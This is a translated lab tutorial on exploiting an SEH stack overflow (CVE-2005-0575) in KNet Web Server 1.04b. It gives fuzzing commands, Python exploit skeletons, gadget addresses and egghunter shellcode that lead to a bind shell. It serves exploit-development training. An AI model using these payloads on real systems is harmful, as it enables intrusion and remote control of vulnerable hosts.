SEH Exploitation on KNet Web Server 1.04b (CVE-2005-0575 Exploitation Write-Up)

Written by : Antonius (w1sdom)

Web : www.bluedragonsec.com

Github : https://github.com/bluedragonsecurity

This is a very old write-up about CVE-2005-0575 Remote Exploitation, this is very old and might not be relevant anymore ! you have been warned ! I forgot when I made it. This is translated from Indonesian language (as always).     

This section discusses exploitation techniques on a vulnerable application that uses the Structured Exception Handling (SEH) mechanism. Training participants will be given an example vulnerable application that uses SEH for exploitation practice.

Lab Architecture

Attacker machine: x86 Kali Linux — IP: 10.200.0.5

Target machine: x86 Windows XP SP3 — IP: 10.200.0.120

SEH Overview

SEH is a mechanism that provides exception handling when an error occurs during application runtime. The SEH implementation is a stack-based linked list. This mechanism can be provided either by the operating system or by the application's source code.

The mechanism is essentially straightforward:

Before the SEH prolog: the stack contains the size of the local variables needed by the caller → Stack: {8}

After calling the prolog: the caller's return address is pushed onto the stack → Stack: {8, RetAddr}

When an exception occurs, SEH will be located at ESP+8. To transition from SEH to NSEH we can use a ROP gadget such as: POP r32 → POP r32 → RET (pop 4 bytes from stack, pop another 4 bytes, then ret).

After successfully escaping from SEH we land at NSEH, where we only have 4 bytes of buffer we control. At this point we can use a short jump, e.g.: EB D0.

Fuzzing with Spike

To discover the bug in KNet Web Server 1.04b we will perform fuzzing using the Spike fuzzer. On the Kali Linux machine, create the following Spike template:

x

Next, attach KNet to OllyDbg and run fuzzing with Spike. Launch the fuzzer from the Kali Linux machine:

generic_send_tcp 10.200.0.120 80 httpd.spk 0 0

The fuzzing result using the httpd.spk template above will cause a crash in KNet, where we can observe that the variable being tested is the length of the filename in an HTTP GET request. On the Windows machine we can see that KNet has crashed and the SE Handler has been successfully overwritten with 0x41414141.

OllyDbg showing KNet crash with SE Handler overwritten by 0x41414141

Overwriting the SE Handler

To determine how many bytes are needed before the SEH handler is overwritten, we will use pattern_create.rb. Generate a 1300-byte pattern:

/usr/share/metasploit-framework/tools/pattern_create.rb 1300

Generating a Metasploit pattern with pattern_create.rb

Insert the pattern into the first basic exploit skeleton:

import socket 

sploit="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu" 

buffer="GET /" + sploit + " HTTP/1.1\r\n" 

buffer+="Host: 10.200.0.120\r\n" 

buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 

buffer+="User-Agent: Mozilla/5.0\r\n" 

buffer+="Content-Length: 1048580\r\n\r\n" 

s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 

s.connect(("10.200.0.120", 80)) 

s.send(buffer) s.close()

 

Re-attach KNet to OllyDbg, run the exploit above, and at the time of the crash observe that SEH has been overwritten with the bytes 6f42336f.

OllyDbg SEH chain showing SE handler overwritten with 6F42336F

Find the offset of those four bytes using pattern_offset.rb:

/usr/share/metasploit-framework/tools/pattern_offset.rb 6f42336f

# Output: [*] Exact match at offset 1210

NOTE: Based on the pattern_offset.rb result, SEH will be overwritten after 1210 bytes.

Verify with the second exploit skeleton:

import socket 

seh = "\x43\x42\x41\x40" 

sploit = "\x90" * 1210 + seh 

buffer="GET /" + sploit + " HTTP/1.1\r\n" 

buffer+="Host: 10.200.0.120\r\n" 

buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 

buffer+="User-Agent: Mozilla/5.0\r\n" 

buffer+="Content-Length: 1048580\r\n\r\n" 

s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 

s.connect(("10.200.0.120", 80)) 

s.send(buffer) 

s.close()

Re-attach KNet to OllyDbg and confirm that the SEH handler has been overwritten with 0x40414243.

From SEH to NSEH: POP POP RET

After overwriting the SEH handler, the next step is to redirect execution from SEH to NSEH. Many different payloads can be used here; we will use the most popular approach — the POP POP RET instruction sequence.

To locate a usable POP POP RET sequence, we use the SafeSEH module scanner plugin in OllyDbg.

SafeSEH Module Scanner results in OllyDbg

From the scan results we can see that a POP POP RET sequence within KNet.exe itself is available for use. Search for it using OllyDbg's "Find sequence of commands" feature:

Finding POP POP RET sequence in KNet.exe using OllyDbg

The POP POP RET sequence is found inside KNet.exe at memory address 0x004016E1.

Craft the exploit skeleton using this address:

import socket 

seh = “\xe1\x16\x40” 

sploit = “\x90” * 1210 + seh 

buffer = “GET /” + sploit + “ HTTP/1.1\r\n” 

buffer += “Host: 10.200.0.120\r\n” 

buffer += “Content-Type: application/x-www-form-urlencoded\r\n” 

buffer += “User-Agent: Mozilla/5.0\r\n” 

buffer += “Content-Length: 1048580\r\n\r\n” 

print len(sploit) 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

s.connect((“10.200.0.120”, 80)) 

s.send(buffer) 

s.close()

Re-attach KNet with OllyDbg and set a breakpoint at 0x004016E1, then run the exploit. When the crash occurs, press Shift+F9 and execution will be redirected to our POP POP RET gadget at 0x004016E1.

Execution redirected to POP POP RET gadget at 0x004016E1

Press F7 to step through until we reach NSEH.

NSEH reached — we control the 4-byte buffer at NSEH

We can confirm that we now control a 4-byte buffer at NSEH.

Stage 2 Payload: EggHunter and Final Shellcode

Once we land at NSEH, we need a second-stage payload. Here we will use the short jump EB D0 to jump backward into a few dozen bytes of buffer we control, where we will place the EggHunter shellcode.

The EggHunter is a small shellcode typically used when the currently controlled buffer is not large enough to host a full-sized shellcode. It scans process memory for a unique marker (tag) that is placed directly before the real shellcode. Once the marker is found, execution is redirected to that memory address and the real shellcode runs.

Second-Stage Payload with Short Jump

import socket 

seh = “\xe1\x16\x40” 

nseh = “\xeb\xd0\x90\x90” 

sploit = “\x90” * 1206 + nseh + seh 

buffer = “GET /” + sploit + “ HTTP/1.1\r\n” 

buffer += “Host: 10.200.0.120\r\n” 

buffer += “Content-Type: application/x-www-form-urlencoded\r\n” 

buffer += “User-Agent: Mozilla/5.0\r\n” 

buffer += “Content-Length: 1048580\r\n\r\n” 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

s.connect((“10.200.0.120”, 80)) 

s.send(buffer) 
s.close()

Set a breakpoint at 0x004016E1, run the exploit, press Shift+F9 on the crash, and step with F7. When execution reaches Stage 2, the EB D0 short jump redirects us into the NOP sled / EggHunter area we control.

EB D0 short jump redirecting into the NOP sled / EggHunter area

EggHunter (32 bytes) — Marker: w00t

We use the 32-byte EggHunter from 0xff (Exploit-DB ID 16283) with the marker w00t:

# 32-byte EggHunter shellcode (NtAccessCheckAndAuditAlarm syscall method) 

egghunter = (“\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7”)

NOTE: The marker T00W (ASCII for w00t prefixed twice) must be placed immediately before the real shellcode so the EggHunter can locate it in memory.

Final Payload Layout

Total buffer before SEH overwrite: 1213 bytes (3-byte SEH overwrite). The layout is:

Final Exploit Code

https://github.com/bluedragonsecurity/exploits/tree/main/CVE-2005-0575-EXPLOIT

Execution Result

Restart KNet Web Server on the Windows machine, then run the final exploit from Kali Linux:

KNet Web Server running on Windows XP SP3 target

A bind shell on port 4444 has been successfully obtained on the target Windows XP SP3 machine. We now have full command-line access from the Kali Linux attacker machine via Telnet.

Bind shell obtained — full command-line access on the target via Telnet

I am Chinese based in Indonesia. I do low level vulnerability research & hardware hacking (main focus : robotics).

Nicknames : w1sdom, sw0rdm4n, ringlayer, robotsoft, bluedragonsec, ev1lut10n, d4r3d3v1l, jck.marshall (1 time usage), 黑蝎子

Low-Level Vulnerability Research | Hardware Hacking | Robotics | Chinese | Polymath






Hobbies

music (fingerstyle guitar & keyboard)
martial art (muay thai, tae kwon do, boxing, bjj).

Music Channel
Martial Art Channel

Skills & Expertise
Vulnerability Research Static Source Code Analysis Kernel Exploitation Userland Exploitation Heap Exploitation Stack Exploitation Fuzzing Hardware Hacking Network Security Reverse Engineering Modern Mitigation Bypass Deep Learning Mechatronics Electronics Robotics Tactical Hacking Device Development Mathematics Machine Learning

Documentations
Github

Now Playing: ...